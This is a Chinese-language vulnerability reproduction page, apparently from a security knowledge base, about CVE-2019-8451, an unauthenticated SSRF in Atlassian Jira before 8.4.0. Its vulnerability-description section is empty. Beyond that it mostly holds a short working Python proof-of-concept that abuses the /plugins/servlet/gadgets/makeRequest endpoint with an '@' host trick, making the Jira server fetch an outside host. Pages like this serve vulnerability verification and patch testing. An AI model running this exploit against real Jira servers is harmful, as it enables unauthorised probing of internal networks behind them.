menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证 chevron_right (CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证.md
    751 B / 2021-07-15 19:48:47
        (CVE-2019-8451)Atlassian Jira 未授权SSRF漏洞验证
    ==================================================
    
    一、漏洞简介
    ------------
    
    二、影响范围
    ------------
    
    Atlassian Jira \< 8.4.0
    
    三、复现过程
    ------------
    
    ![](./resource/(CVE-2019-8451)AtlassianJira未授权SSRF漏洞验证/media/rId24.png)
    
    > https://github.com/ianxtianxt/CVE-2019-8451
    
        #coding:utf-8
        import requests
    
        host = 'http://xx.xx.xx.xx:8080'
        header = {
                                'X-Atlassian-Token': 'no-check',
                                'Connection': 'close'
                        }
    
        url = host + '/plugins/servlet/gadgets/makeRequest?url='+host+'@www.baidu.com/'
        html = requests.get(url = url,headers = header)
        print html.text
    
    
    links
    file_download